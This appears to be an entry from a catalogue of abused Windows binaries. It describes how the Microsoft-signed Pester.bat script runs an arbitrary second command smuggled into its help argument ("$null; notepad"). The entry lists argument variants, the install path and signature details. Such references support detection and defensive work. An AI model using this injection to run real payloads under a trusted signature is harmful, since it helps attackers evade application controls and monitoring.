## pester.bat * Functions: Execute ``` # Execute notepad Pester.bat /help "$null; notepad" # Execute calc Pester.bat /help "$null; calc" # Execute Get-Process cmdlet Pester.bat /help "$null; ps" # Other options for 2nd parameter pester.bat help "$null; notepad" pester.bat /help "$null; notepad" pester.bat ? "$null; notepad" pester.bat -? "$null; notepad" pester.bat /? "$null; notepad" # 3rd parameter can be anything pester.bat /help "'doesnotexist'; notepad" pester.bat /help "Get-Help; notepad" pester.bat /help "gcm;notepad" # 4th parameter is the payload ``` Acknowledgements: * Emin Atac - @p0w3rsh3ll Code sample: None Resources: None Full path: ```powershell # Shipped inbox "c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" # There can be other versions present as well Dir "c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat" ``` Notes: This file is digitally signed by a Microsoft certificate ```powershell Get-FileHash "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" Algorithm Hash Path --------- ---- ---- SHA256 EB83A9D837CFE2F409CA3839B017E307A7A65782CB6A0AE0C50731C244DAD40E C:\Program Files\WindowsPower... Get-AuthenticodeSignature "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" | fl SignerCertificate : [Subject] CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US [Issuer] CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US [Serial Number] 33000001733031072665B8B9B3000000000173 [Not Before] 11/08/2017 22:23:35 [Not After] 11/08/2018 22:23:35 [Thumbprint] 14590DC5C3AAF238FCFD7785B4B93F4071402C34 TimeStamperCertificate : [Subject] CN=Microsoft Time-Stamp Service, OU=nCipher DSE ESN:12E7-3064-6112, OU=AOC, O=Microsoft Corporation, L=Redmond, S=Washington, C=US [Issuer] CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US [Serial Number] 33000000AC8A21BC7AD29B72F40000000000AC [Not Before] 07/09/2016 19:56:54 [Not After] 07/09/2018 19:56:54 [Thumbprint] 3970258B14C879DD5F0C5DE98B9CB39499F71CB7 Status : Valid StatusMessage : Signature verified. Path : C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat SignatureType : Catalog IsOSBinary : True ```